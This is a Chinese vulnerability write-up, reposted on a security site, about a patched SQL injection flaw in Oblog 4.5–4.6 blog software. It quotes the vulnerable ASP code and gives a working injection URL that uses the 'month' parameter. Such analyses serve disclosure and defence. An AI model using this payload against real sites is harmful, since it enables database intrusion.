首页网络安全漏洞分析正文

我要投稿

Oblog最新注入漏洞分析(已修补)

admin 漏洞分析

2023-12-04 0 663

Date：2008-5-15 Author：Yamato[BCT] Version：Oblog 4.5-4.6 sql 代码分析：文件In/Class_UserCommand.asp : strMonth=Request("month") //第63行 strDay=Request("day") …… Case "month" //第84行 Dim LastDay G_P_FileName = G_P_FileName & "month&month=" & strMonth strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01" mYear=Left(strMonth,4) mMonth=Right(strMonth,2) If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then LastDay = "31"…… Else //第109行 SqlPart = " And Addtime >=’"&strMonth&"01’ AND Addtime < ’"&strMonth&LastDay&"’ " 构造合适的变量strMonth进行注射测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0–01 strDay变量从month中获得日期数据，并判断strDay是否为日期数据。所以构造的注射语句为： http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)–01 执行sql语句采用rst.Open strSql,Conn,1,1 不能修改记录集.

收藏 (0) 打赏

感谢您的支持，我会继续努力的!

打开微信/支付宝扫一扫，即可进行扫码打赏哦，分享从这里开始，精彩与您同在

点赞 (0)

悠久资源漏洞分析 Oblog最新注入漏洞分析(已修补) https://www.u-9.cn/security/fenxi/72571.html

&amp &hellip &quot strDay strMonth 分析最新注入漏洞

admin

Oblog最新注入漏洞分析(已修补)

上一篇：入侵检测系统漏洞的分析

Oblog最新注入漏洞分析(已修补)

下一篇： Discuz!!论坛wap功能模块编码的注射漏洞分析

常见问题

相关文章

Velocity Parse()函数引发的本地包含漏洞及利用方法

Velocity Parse()函数引发的本地包含漏洞及利用方法

漏洞分析

admin

5个月前 364

查找Centos Linux服务器上入侵者的WebShell后门

查找Centos Linux服务器上入侵者的WebShell后门

漏洞分析

admin

5个月前 1,124

$微软\”后门\”ntsd的发现与清除$

微软\”后门\”ntsd的发现与清除

漏洞分析

admin

5个月前 352

WEBSHELL箱子系统V1.0收信箱子代码漏洞分析及解决方法

WEBSHELL箱子系统V1.0收信箱子代码漏洞分析及解决方法

漏洞分析

admin

5个月前 714

猜你喜欢

Velocity Parse()函数引发的本地包含漏洞及利用方法 2023-12-07
查找Centos Linux服务器上入侵者的WebShell后门 2023-12-07
微软\”后门\”ntsd的发现与清除 2023-12-07
WEBSHELL箱子系统V1.0收信箱子代码漏洞分析及解决方法 2023-12-07
网站的九大敌人有哪些千万别给Web应用漏洞可趁之机 2023-12-07
常用的网站漏洞扫描工具小结 2023-12-07
163邮箱记事本存储型Xss漏洞分析与补救 2023-12-07
php挖洞基础知识篇以及防范方法 2023-12-07
nginx+cgi解析php容易出现的漏洞的分析 2023-12-07
路由器、交换机及防火墙漏洞的发现与防范方法 2023-12-07

发表评论

暂无评论

官方客服团队

为您解决烦忧 - 24小时在线专业服务

联系官方团队在线提交工单

如遇问题，请联系客服
联系客服请注明来意高端主题开发
微信公众号

总裁主题·高端主题
返回顶部